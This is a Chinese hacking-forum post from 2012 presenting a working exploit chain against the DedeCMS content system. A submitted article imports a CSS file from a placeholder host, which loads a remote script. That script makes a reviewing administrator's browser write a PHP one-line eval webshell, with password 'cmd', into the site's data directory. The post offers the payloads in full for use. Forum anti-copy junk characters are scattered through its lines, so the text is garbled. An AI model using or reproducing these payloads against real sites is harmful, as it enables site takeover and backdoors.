找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1736|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell) P3 N+ H) u, i5 v
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
1 }) R: V' ?! G  w目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。: H6 X* E" W7 P/ e2 ?( B; B* R$ N
下面说说利用方法。& ^$ g6 f- b" C" z3 Y
条件有2个:
  t. `8 h! }/ D0 c2 R3 Y4 @1.开启注册. O& E  g1 }. ^
2.开启投稿: \( r  \. Q. Y4 l! T) z" c
注册会员----发表文章
) E2 }/ f) U2 `. S内容填写:
6 y+ Z' b2 o& M, L4 Q: X, a复制代码
3 m" ?/ U( [  m+ l3 E; @7 w5 R& v<style>@im\port'\http://xxx.com/xss.css';</style>
2 ]8 \( k( c9 y5 m' Q$ Y新建XSS.Css/ B5 e% `7 D. O# \" P! u# F& m* x
复制代码
/ S! n1 f7 B% u" U.body{' J7 }" M% [$ |) C1 x
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
/ `/ S! v* m* F/ q& m6 v$ A新建xss.js 内容为8 J" q' @( H+ a9 Q
复制代码
2 @( I  w) o. W9 ]1.var request = false;
% ]) b  G6 C) a  ?* P8 R2.if(window.XMLHttpRequest) {( V( G+ N; h2 r8 @8 @3 R4 l  a6 K
3.request = new XMLHttpRequest();
) j$ g+ l  e1 ~: q$ d  f4.if(request.overrideMimeType) {
& S) E9 O4 e) j" e5.request.overrideMimeType('text/xml');% g4 z( q1 r( G2 ^+ S" I
6.}1 z$ S& r- u. @7 z
7.} else if(window.ActiveXObject) {; P9 {8 d0 }* ?! r* S
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];; O: C; U2 V7 A5 @. K
9.for(var i=0; i<versions.length; i++) {
! [; R& h+ z; W& ~8 z7 |6 p10.try {9 j& }3 G4 U. ?
11.request = new ActiveXObject(versions);6 R' b: ?2 _3 d
12.} catch(e) {}& G4 J% C+ ~9 m/ n- D6 v
13.}8 |' W5 z. @* R9 L2 t3 d" X9 c
14.}. k3 m0 R# X7 J. ]
15.xmlhttp=request;
6 k1 t% L: `% O% _* D16.function getFolder( url ){1 d: h* T8 Y! U
17. obj = url.split('/')! }- p: V- D3 d/ \+ o
18. return obj[obj.length-2]
: X) J) ?1 W1 H; p2 b19.}; P1 d& c2 k8 ]9 J
20.oUrl = top.location.href;
3 H6 `6 v9 [- p* c/ r1 }) A8 a21.u = getFolder(oUrl);; j# v  ~+ v' w% g3 Y: s/ C5 J
22.add_admin();4 _) Z7 Q# h8 H# l3 Q- C6 a
23.function add_admin(){& C/ w0 v# q. P/ i0 a
24.var url= "/"+u+"/sys_sql_query.php";
8 N& Q! L. Z& q6 w) L7 H& B25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";4 ^2 U7 c3 e: Q+ J
26.xmlhttp.open("POST", url, true);1 R, Y9 ~" L6 n# I4 M* j* D
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");1 W+ f* t" t) ^" A( k4 |
28.xmlhttp.setRequestHeader("Content-length", params.length);
3 ~& p" F8 ]; B! l  _/ Q) ~. U29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");4 e  i1 l2 f  ?/ L: y$ q  Q
30.xmlhttp.send(params);
0 s/ s# w0 `! o9 \: g: U" b6 b31.}7 {* o- Z2 }7 \. q' E. g
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表